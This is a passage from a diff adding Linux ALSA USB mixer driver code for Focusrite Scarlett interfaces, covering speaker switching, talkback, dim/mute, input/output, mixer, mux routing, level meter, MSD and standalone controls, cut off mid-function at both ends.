++		snd_ctl_notify(card,
++			       SNDRV_CTL_EVENT_MASK_VALUE |
++				 SNDRV_CTL_EVENT_MASK_INFO,
++			       &private->sw_hw_ctls[i]->id);
++	}
++
++	/* when the next monitor-other notify comes in, update the mux
++	 * configuration
++	 */
++	private->speaker_switching_switched = 1;
++
++	return 0;
++}
++
++/* when speaker switching gets disabled, reenable the hw/sw controls
++ * and invalidate the routing
++ */
++static void scarlett2_speaker_switch_disable(struct usb_mixer_interface *mixer)
++{
++	struct snd_card *card = mixer->chip->card;
++	struct scarlett2_data *private = mixer->private_data;
++	int i;
++
++	/* enable the line out SW/HW switch */
++	for (i = 0; i < 4; i++) {
++		scarlett2_sw_hw_ctl_rw(private, i);
++		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_INFO,
++			       &private->sw_hw_ctls[i]->id);
++	}
++
++	/* when the next monitor-other notify comes in, update the mux
++	 * configuration
++	 */
++	private->speaker_switching_switched = 1;
++}
++
++static int scarlett2_speaker_switch_enum_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->speaker_switching_switch;
++	val = min(ucontrol->value.enumerated.item[0], 2U);
++
++	if (oval == val)
++		goto unlock;
++
++	private->speaker_switching_switch = val;
++
++	/* enable/disable speaker switching */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
++		0, !!val);
++	if (err < 0)
++		goto unlock;
++
++	/* if speaker switching is enabled, select main or alt */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
++		0, val == 2);
++	if (err < 0)
++		goto unlock;
++
++	/* update controls if speaker switching gets enabled or disabled */
++	if (!oval && val)
++		err = scarlett2_speaker_switch_enable(mixer);
++	else if (oval && !val)
++		scarlett2_speaker_switch_disable(mixer);
++
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_speaker_switch_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_speaker_switch_enum_ctl_info,
++	.get  = scarlett2_speaker_switch_enum_ctl_get,
++	.put  = scarlett2_speaker_switch_enum_ctl_put,
++};
++
++static int scarlett2_add_speaker_switch_ctl(
++	struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	if (!info->has_speaker_switching)
++		return 0;
++
++	return scarlett2_add_new_ctl(
++		mixer, &scarlett2_speaker_switch_enum_ctl,
++		0, 1, "Speaker Switching Playback Enum",
++		&private->speaker_switching_ctl);
++}
++
++/*** Talkback and Talkback Map Controls ***/
++
++static int scarlett2_talkback_enum_ctl_info(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_info *uinfo)
++{
++	static const char *const values[3] = {
++		"Disabled", "Off", "On"
++	};
++
++	return snd_ctl_enum_info(uinfo, 1, 3, values);
++}
++
++static int scarlett2_talkback_enum_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->monitor_other_updated) {
++		err = scarlett2_update_monitor_other(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->talkback_switch;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_talkback_enum_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->talkback_switch;
++	val = min(ucontrol->value.enumerated.item[0], 2U);
++
++	if (oval == val)
++		goto unlock;
++
++	private->talkback_switch = val;
++
++	/* enable/disable talkback */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE,
++		1, !!val);
++	if (err < 0)
++		goto unlock;
++
++	/* if talkback is enabled, select main or alt */
++	err = scarlett2_usb_set_config(
++		mixer, SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH,
++		1, val == 2);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_talkback_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_talkback_enum_ctl_info,
++	.get  = scarlett2_talkback_enum_ctl_get,
++	.put  = scarlett2_talkback_enum_ctl_put,
++};
++
++static int scarlett2_talkback_map_ctl_get(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = elem->control;
++
++	ucontrol->value.integer.value[0] = private->talkback_map[index];
++
++	return 0;
++}
++
++static int scarlett2_talkback_map_ctl_put(
++	struct snd_kcontrol *kctl, struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] =
++		private->info->port_count;
++	int num_mixes = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++
++	int index = elem->control;
++	int oval, val, err = 0, i;
++	u16 bitmap = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->talkback_map[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->talkback_map[index] = val;
++
++	for (i = 0; i < num_mixes; i++)
++		bitmap |= private->talkback_map[i] << i;
++
++	/* Send updated bitmap to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_TALKBACK_MAP,
++				       0, bitmap);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_talkback_map_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_talkback_map_ctl_get,
++	.put  = scarlett2_talkback_map_ctl_put,
++};
++
++static int scarlett2_add_talkback_ctls(
++	struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_mixes = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++	int err, i;
++	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++
++	if (!info->has_talkback)
++		return 0;
++
++	err = scarlett2_add_new_ctl(
++		mixer, &scarlett2_talkback_enum_ctl,
++		0, 1, "Talkback Playback Enum",
++		&private->talkback_ctl);
++	if (err < 0)
++		return err;
++
++	for (i = 0; i < num_mixes; i++) {
++		snprintf(s, sizeof(s),
++			 "Talkback Mix %c Playback Switch", i + 'A');
++		err = scarlett2_add_new_ctl(mixer, &scarlett2_talkback_map_ctl,
++					    i, 1, s, NULL);
++		if (err < 0)
++			return err;
++	}
++
++	return 0;
++}
++
++/*** Dim/Mute Controls ***/
++
++static int scarlett2_dim_mute_ctl_get(struct snd_kcontrol *kctl,
++				      struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->vol_updated) {
++		err = scarlett2_update_volumes(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.integer.value[0] = private->dim_mute[elem->control];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_dim_mute_ctl_put(struct snd_kcontrol *kctl,
++				      struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++
++	int index = elem->control;
++	int oval, val, err = 0, i;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->dim_mute[index];
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->dim_mute[index] = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_DIM_MUTE,
++				       index, val);
++	if (err == 0)
++		err = 1;
++
++	if (index == SCARLETT2_BUTTON_MUTE)
++		for (i = 0; i < num_line_out; i++) {
++			int line_index = line_out_remap(private, i);
++
++			if (private->vol_sw_hw_switch[line_index]) {
++				private->mute_switch[line_index] = val;
++				snd_ctl_notify(mixer->chip->card,
++					       SNDRV_CTL_EVENT_MASK_VALUE,
++					       &private->mute_ctls[i]->id);
++			}
++		}
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_dim_mute_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_dim_mute_ctl_get,
++	.put  = scarlett2_dim_mute_ctl_put
++};
++
++/*** Create the analogue output controls ***/
++
++static int scarlett2_add_line_out_ctls(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int num_line_out =
++		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
++	int err, i;
++	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++
++	/* Add R/O HW volume control */
++	if (info->line_out_hw_vol) {
++		snprintf(s, sizeof(s), "Master HW Playback Volume");
++		err = scarlett2_add_new_ctl(mixer,
++					    &scarlett2_master_volume_ctl,
++					    0, 1, s, &private->master_vol_ctl);
++		if (err < 0)
++			return err;
++	}
++
++	/* Add volume controls */
++	for (i = 0; i < num_line_out; i++) {
++		int index = line_out_remap(private, i);
++
++		/* Fader */
++		if (info->line_out_descrs[i])
++			snprintf(s, sizeof(s),
++				 "Line %02d (%s) Playback Volume",
++				 i + 1, info->line_out_descrs[i]);
++		else
++			snprintf(s, sizeof(s),
++				 "Line %02d Playback Volume",
++				 i + 1);
++		err = scarlett2_add_new_ctl(mixer,
++					    &scarlett2_line_out_volume_ctl,
++					    i, 1, s, &private->vol_ctls[i]);
++		if (err < 0)
++			return err;
++
++		/* Mute Switch */
++		snprintf(s, sizeof(s),
++			 "Line %02d Mute Playback Switch",
++			 i + 1);
++		err = scarlett2_add_new_ctl(mixer,
++					    &scarlett2_mute_ctl,
++					    i, 1, s,
++					    &private->mute_ctls[i]);
++		if (err < 0)
++			return err;
++
++		/* Make the fader and mute controls read-only if the
++		 * SW/HW switch is set to HW
++		 */
++		if (private->vol_sw_hw_switch[index])
++			scarlett2_vol_ctl_set_writable(mixer, i, 0);
++
++		/* SW/HW Switch */
++		if (info->line_out_hw_vol) {
++			snprintf(s, sizeof(s),
++				 "Line Out %02d Volume Control Playback Enum",
++				 i + 1);
++			err = scarlett2_add_new_ctl(mixer,
++						    &scarlett2_sw_hw_enum_ctl,
++						    i, 1, s,
++						    &private->sw_hw_ctls[i]);
++			if (err < 0)
++				return err;
++
++			/* Make the switch read-only if the line is
++			 * involved in speaker switching
++			 */
++			if (private->speaker_switching_switch && i < 4)
++				scarlett2_sw_hw_ctl_ro(private, i);
++		}
++	}
++
++	/* Add dim/mute controls */
++	if (info->line_out_hw_vol)
++		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++) {
++			err = scarlett2_add_new_ctl(
++				mixer, &scarlett2_dim_mute_ctl,
++				i, 1, scarlett2_dim_mute_names[i],
++				&private->dim_mute_ctls[i]);
++			if (err < 0)
++				return err;
++		}
++
++	return 0;
++}
++
++/*** Create the analogue input controls ***/
++
++static int scarlett2_add_line_in_ctls(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	int err, i;
++	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++	const char *fmt = "Line In %d %s Capture %s";
++	const char *fmt2 = "Line In %d-%d %s Capture %s";
++
++	/* Add input level (line/inst) controls */
++	for (i = 0; i < info->level_input_count; i++) {
++		snprintf(s, sizeof(s), fmt, i + 1 + info->level_input_first,
++			 "Level", "Enum");
++		err = scarlett2_add_new_ctl(mixer, &scarlett2_level_enum_ctl,
++					    i, 1, s, &private->level_ctls[i]);
++		if (err < 0)
++			return err;
++	}
++
++	/* Add input pad controls */
++	for (i = 0; i < info->pad_input_count; i++) {
++		snprintf(s, sizeof(s), fmt, i + 1, "Pad", "Switch");
++		err = scarlett2_add_new_ctl(mixer, &scarlett2_pad_ctl,
++					    i, 1, s, &private->pad_ctls[i]);
++		if (err < 0)
++			return err;
++	}
++
++	/* Add input air controls */
++	for (i = 0; i < info->air_input_count; i++) {
++		snprintf(s, sizeof(s), fmt, i + 1, "Air", "Switch");
++		err = scarlett2_add_new_ctl(mixer, &scarlett2_air_ctl,
++					    i, 1, s, &private->air_ctls[i]);
++		if (err < 0)
++			return err;
++	}
++
++	/* Add input phantom controls */
++	if (info->inputs_per_phantom == 1) {
++		for (i = 0; i < info->phantom_count; i++) {
++			snprintf(s, sizeof(s), fmt, i + 1,
++				 "Phantom Power", "Switch");
++			err = scarlett2_add_new_ctl(
++				mixer, &scarlett2_phantom_ctl,
++				i, 1, s, &private->phantom_ctls[i]);
++			if (err < 0)
++				return err;
++		}
++	} else if (info->inputs_per_phantom > 1) {
++		for (i = 0; i < info->phantom_count; i++) {
++			int from = i * info->inputs_per_phantom + 1;
++			int to = (i + 1) * info->inputs_per_phantom;
++
++			snprintf(s, sizeof(s), fmt2, from, to,
++				 "Phantom Power", "Switch");
++			err = scarlett2_add_new_ctl(
++				mixer, &scarlett2_phantom_ctl,
++				i, 1, s, &private->phantom_ctls[i]);
++			if (err < 0)
++				return err;
++		}
++	}
++	if (info->phantom_count) {
++		err = scarlett2_add_new_ctl(
++			mixer, &scarlett2_phantom_persistence_ctl, 0, 1,
++			"Phantom Power Persistence Capture Switch", NULL);
++		if (err < 0)
++			return err;
++	}
++
++	return 0;
++}
++
++/*** Mixer Volume Controls ***/
++
++static int scarlett2_mixer_ctl_info(struct snd_kcontrol *kctl,
++				    struct snd_ctl_elem_info *uinfo)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++
++	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
++	uinfo->count = elem->channels;
++	uinfo->value.integer.min = 0;
++	uinfo->value.integer.max = SCARLETT2_MIXER_MAX_VALUE;
++	uinfo->value.integer.step = 1;
++	return 0;
++}
++
++static int scarlett2_mixer_ctl_get(struct snd_kcontrol *kctl,
++				   struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++
++	ucontrol->value.integer.value[0] = private->mix[elem->control];
++	return 0;
++}
++
++static int scarlett2_mixer_ctl_put(struct snd_kcontrol *kctl,
++				   struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int oval, val, num_mixer_in, mix_num, err = 0;
++	int index = elem->control;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->mix[index];
++	val = clamp(ucontrol->value.integer.value[0],
++		    0L, (long)SCARLETT2_MIXER_MAX_VALUE);
++	num_mixer_in = port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
++	mix_num = index / num_mixer_in;
++
++	if (oval == val)
++		goto unlock;
++
++	private->mix[index] = val;
++	err = scarlett2_usb_set_mix(mixer, mix_num);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const DECLARE_TLV_DB_MINMAX(
++	db_scale_scarlett2_mixer,
++	SCARLETT2_MIXER_MIN_DB * 100,
++	SCARLETT2_MIXER_MAX_DB * 100
++);
++
++static const struct snd_kcontrol_new scarlett2_mixer_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
++		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
++	.name = "",
++	.info = scarlett2_mixer_ctl_info,
++	.get  = scarlett2_mixer_ctl_get,
++	.put  = scarlett2_mixer_ctl_put,
++	.private_value = SCARLETT2_MIXER_MAX_DB, /* max value */
++	.tlv = { .p = db_scale_scarlett2_mixer }
++};
++
++static int scarlett2_add_mixer_ctls(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int err, i, j;
++	int index;
++	char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++
++	int num_inputs =
++		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
++	int num_outputs =
++		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
++
++	for (i = 0, index = 0; i < num_outputs; i++)
++		for (j = 0; j < num_inputs; j++, index++) {
++			snprintf(s, sizeof(s),
++				 "Mix %c Input %02d Playback Volume",
++				 'A' + i, j + 1);
++			err = scarlett2_add_new_ctl(mixer, &scarlett2_mixer_ctl,
++						    index, 1, s, NULL);
++			if (err < 0)
++				return err;
++		}
++
++	return 0;
++}
++
++/*** Mux Source Selection Controls ***/
++
++static int scarlett2_mux_src_enum_ctl_info(struct snd_kcontrol *kctl,
++					   struct snd_ctl_elem_info *uinfo)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	unsigned int item = uinfo->value.enumerated.item;
++	int items = private->num_mux_srcs;
++	int port_type;
++
++	uinfo->type = SNDRV_CTL_ELEM_TYPE_ENUMERATED;
++	uinfo->count = elem->channels;
++	uinfo->value.enumerated.items = items;
++
++	if (item >= items)
++		item = uinfo->value.enumerated.item = items - 1;
++
++	for (port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		if (item < port_count[port_type][SCARLETT2_PORT_IN]) {
++			const struct scarlett2_port *port =
++				&scarlett2_ports[port_type];
++
++			sprintf(uinfo->value.enumerated.name,
++				port->src_descr, item + port->src_num_offset);
++			return 0;
++		}
++		item -= port_count[port_type][SCARLETT2_PORT_IN];
++	}
++
++	return -EINVAL;
++}
++
++static int scarlett2_mux_src_enum_ctl_get(struct snd_kcontrol *kctl,
++					  struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	if (private->mux_updated) {
++		err = scarlett2_usb_get_mux(mixer);
++		if (err < 0)
++			goto unlock;
++	}
++	ucontrol->value.enumerated.item[0] = private->mux[index];
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static int scarlett2_mux_src_enum_ctl_put(struct snd_kcontrol *kctl,
++					  struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++	int index = line_out_remap(private, elem->control);
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->mux[index];
++	val = min(ucontrol->value.enumerated.item[0],
++		  private->num_mux_srcs - 1U);
++
++	if (oval == val)
++		goto unlock;
++
++	private->mux[index] = val;
++	err = scarlett2_usb_set_mux(mixer);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_mux_src_enum_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = scarlett2_mux_src_enum_ctl_info,
++	.get  = scarlett2_mux_src_enum_ctl_get,
++	.put  = scarlett2_mux_src_enum_ctl_put,
++};
++
++static int scarlett2_add_mux_enums(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int port_type, channel, i;
++
++	for (i = 0, port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		for (channel = 0;
++		     channel < port_count[port_type][SCARLETT2_PORT_OUT];
++		     channel++, i++) {
++			int err;
++			char s[SNDRV_CTL_ELEM_ID_NAME_MAXLEN];
++			const char *const descr =
++				scarlett2_ports[port_type].dst_descr;
++
++			snprintf(s, sizeof(s) - 5, descr, channel + 1);
++			strcat(s, " Enum");
++
++			err = scarlett2_add_new_ctl(mixer,
++						    &scarlett2_mux_src_enum_ctl,
++						    i, 1, s,
++						    &private->mux_ctls[i]);
++			if (err < 0)
++				return err;
++		}
++	}
++
++	return 0;
++}
++
++/*** Meter Controls ***/
++
++static int scarlett2_meter_ctl_info(struct snd_kcontrol *kctl,
++				    struct snd_ctl_elem_info *uinfo)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++
++	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
++	uinfo->count = elem->channels;
++	uinfo->value.integer.min = 0;
++	uinfo->value.integer.max = 4095;
++	uinfo->value.integer.step = 1;
++	return 0;
++}
++
++static int scarlett2_meter_ctl_get(struct snd_kcontrol *kctl,
++				   struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	u16 meter_levels[SCARLETT2_MAX_METERS];
++	int i, err;
++
++	err = scarlett2_usb_get_meter_levels(elem->head.mixer, elem->channels,
++					     meter_levels);
++	if (err < 0)
++		return err;
++
++	for (i = 0; i < elem->channels; i++)
++		ucontrol->value.integer.value[i] = meter_levels[i];
++
++	return 0;
++}
++
++static const struct snd_kcontrol_new scarlett2_meter_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_PCM,
++	.access = SNDRV_CTL_ELEM_ACCESS_READ | SNDRV_CTL_ELEM_ACCESS_VOLATILE,
++	.name = "",
++	.info = scarlett2_meter_ctl_info,
++	.get  = scarlett2_meter_ctl_get
++};
++
++static int scarlett2_add_meter_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	/* devices without a mixer also don't support reporting levels */
++	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
++		return 0;
++
++	return scarlett2_add_new_ctl(mixer, &scarlett2_meter_ctl,
++				     0, private->num_mux_dsts,
++				     "Level Meter", NULL);
++}
++
++/*** MSD Controls ***/
++
++static int scarlett2_msd_ctl_get(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++
++	ucontrol->value.integer.value[0] = private->msd_switch;
++	return 0;
++}
++
++static int scarlett2_msd_ctl_put(struct snd_kcontrol *kctl,
++				 struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->msd_switch;
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->msd_switch = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_MSD_SWITCH,
++				       0, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_msd_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_msd_ctl_get,
++	.put  = scarlett2_msd_ctl_put,
++};
++
++static int scarlett2_add_msd_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++	const struct scarlett2_device_info *info = private->info;
++
++	if (!info->has_msd_mode)
++		return 0;
++
++	/* If MSD mode is off, hide the switch by default */
++	if (!private->msd_switch && !(mixer->chip->setup & SCARLETT2_MSD_ENABLE))
++		return 0;
++
++	/* Add MSD control */
++	return scarlett2_add_new_ctl(mixer, &scarlett2_msd_ctl,
++				     0, 1, "MSD Mode Switch", NULL);
++}
++
++/*** Standalone Control ***/
++
++static int scarlett2_standalone_ctl_get(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct scarlett2_data *private = elem->head.mixer->private_data;
++
++	ucontrol->value.integer.value[0] = private->standalone_switch;
++	return 0;
++}
++
++static int scarlett2_standalone_ctl_put(struct snd_kcontrol *kctl,
++					struct snd_ctl_elem_value *ucontrol)
++{
++	struct usb_mixer_elem_info *elem = kctl->private_data;
++	struct usb_mixer_interface *mixer = elem->head.mixer;
++	struct scarlett2_data *private = mixer->private_data;
++
++	int oval, val, err = 0;
++
++	mutex_lock(&private->data_mutex);
++
++	oval = private->standalone_switch;
++	val = !!ucontrol->value.integer.value[0];
++
++	if (oval == val)
++		goto unlock;
++
++	private->standalone_switch = val;
++
++	/* Send switch change to the device */
++	err = scarlett2_usb_set_config(mixer,
++				       SCARLETT2_CONFIG_STANDALONE_SWITCH,
++				       0, val);
++	if (err == 0)
++		err = 1;
++
++unlock:
++	mutex_unlock(&private->data_mutex);
++	return err;
++}
++
++static const struct snd_kcontrol_new scarlett2_standalone_ctl = {
++	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
++	.name = "",
++	.info = snd_ctl_boolean_mono_info,
++	.get  = scarlett2_standalone_ctl_get,
++	.put  = scarlett2_standalone_ctl_put,
++};
++
++static int scarlett2_add_standalone_ctl(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
++		return 0;
++
++	/* Add standalone control */
++	return scarlett2_add_new_ctl(mixer, &scarlett2_standalone_ctl,
++				     0, 1, "Standalone Switch", NULL);
++}
++
++/*** Cleanup/Suspend Callbacks ***/
++
++static void scarlett2_private_free(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	cancel_delayed_work_sync(&private->work);
++	kfree(private);
++	mixer->private_data = NULL;
++}
++
++static void scarlett2_private_suspend(struct usb_mixer_interface *mixer)
++{
++	struct scarlett2_data *private = mixer->private_data;
++
++	if (cancel_delayed_work_sync(&private->work))
++		scarlett2_config_save(private->mixer);
++}
++
++/*** Initialisation ***/
++
++static void scarlett2_count_mux_io(struct scarlett2_data *private)
++{
++	const struct scarlett2_device_info *info = private->info;
++	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
++	int port_type, srcs = 0, dsts = 0;
++
++	for (port_type = 0;
++	     port_type < SCARLETT2_PORT_TYPE_COUNT;
++	     port_type++) {
++		srcs += port_count[port_type][SCARLETT2_PORT_IN];
++		dsts += port_count[port_type][SCARLETT2_PORT_OUT];
++	}
++
++	private->num_mux_srcs = srcs;
++	private->num_mux_dsts = dsts;
++}
++
++/* Look through the interface descriptors for the Focusrite Control
++ * interface (bInterfaceClass = 255 Vendor Specific Class) and set
++ * bInterfaceNumber, bEndpointAddress, wMaxPacketSize, and bInterval
++ * in private
++ */
++static int scarlett2_find_fc_interface(struct usb_device *dev,
++				       struct scarlett2_data *private)
++{
++	struct usb_host_config *config = dev->actconfig;
++	int i;
++
++	for (i = 0; i < config->desc.bNumInterfaces; i++) {
++		struct usb_interface *intf = config->interface[i];
++		struct usb_interface_descriptor *desc =
++			&intf->altsetting[0].desc;
